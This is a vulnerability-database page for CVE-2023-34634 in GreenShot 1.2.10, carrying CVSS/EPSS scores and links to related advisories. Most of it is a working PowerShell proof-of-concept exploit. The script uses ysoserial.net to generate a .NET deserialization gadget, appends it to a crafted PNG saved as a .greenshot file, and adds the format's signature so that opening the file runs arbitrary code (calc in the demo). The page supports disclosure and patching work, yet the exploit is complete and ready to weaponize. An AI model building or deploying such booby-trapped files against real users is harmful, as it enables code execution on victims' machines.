Lucene search
P4r4bellum1337DAY-ID-38914HistoryJul 28, 2023 - 12:00 a.m.
GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution Vulnerability
2023-07-2800:00:00
p4r4bellum
0day.today
117
greenshot
insecure deserialization
arbitrary code execution
windows 10
cve-2023-34634
ysoserial.net
png file
calc.exe
CVSS3
7.8
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS
0.923
Percentile
99.0%
# Exploit Title: GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
# Exploit Author: p4r4bellum
# Vendor Homepage: https://getgreenshot.org
# Software Link: https://getgreenshot.org/downloads/
# Version: 1.2.6.10
# Tested on: windows 10.0.19045 N/A build 19045
# CVE : CVE-2023-34634
#
# GreenShot 1.2.10 and below is vulnerable to an insecure object deserialization in its custom *.greenshot format
# A stream of .Net object is serialized and inscureley deserialized when a *.greenshot file is open with the software
# On a default install the *.greenshot file extension is associated with the programm, so double-click on a*.greenshot file
# will lead to arbitrary code execution
#
# Generate the payload. You need yserial.net to be installed on your machine. Grab it at https://github.com/pwntester/ysoserial.net
./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -c "calc" --outputpath payload.bin -o raw
#load the payload
$payload = Get-Content .\payload.bin -Encoding Byte
# retrieve the length of the payload
$length = $payload.Length
# load the required assembly to craft a PNG file
Add-Type -AssemblyName System.Drawing
# the following lines creates a png file with some text. Code borrowed from https://stackoverflow.com/questions/2067920/can-i-draw-create-an-image-with-a-given-text-with-powershell
$filename = "$home\poc.greenshot"
$bmp = new-object System.Drawing.Bitmap 250,61
$font = new-object System.Drawing.Font Consolas,24
$brushBg = [System.Drawing.Brushes]::Green
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString('POC Greenshot',$font,$brushFg,10,10)
$graphics.Dispose()
$bmp.Save($filename)
# append the payload to the PNG file
$payload | Add-Content -Path $filename -Encoding Byte -NoNewline
# append the length of the payload
[System.BitConverter]::GetBytes([long]$length) | Add-Content -Path $filename -Encoding Byte -NoNewline
# append the signature
"Greenshot01.02" | Add-Content -path $filename -NoNewline -Encoding Ascii
# launch greenshot. Calc.exe should be executed
Invoke-Item $filename
Related
zdt
zdt
Greenshot 1.3.274 Deserialization / Command Execution Exploit
2023-08-17 00:00:00
prion
prion
Design/Logic Flaw
2023-08-01 14:15:00
osv
osv
CVE-2023-34634
2023-08-01 14:15:10
metasploit
metasploit
Greenshot .NET Deserialization Fileformat Exploit
2023-08-03 15:58:07
nvd
nvd
CVE-2023-34634
2023-08-01 14:15:10
packetstorm
packetstorm
GreenShot 1.2.10 Arbitrary Code Execution
2023-07-31 00:00:00
Greenshot 1.3.274 Deserialization / Command Execution
2023-08-17 00:00:00
cvelist
cvelist
CVE-2023-34634
2023-08-01 00:00:00
cve
cve
CVE-2023-34634
2023-08-01 14:15:10
exploitdb
exploitdb
GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution
2023-07-28 00:00:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2023-08-18 17:22:46
CVSS3
7.8
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS
0.923
Percentile
99.0%
Related for 1337DAY-ID-38914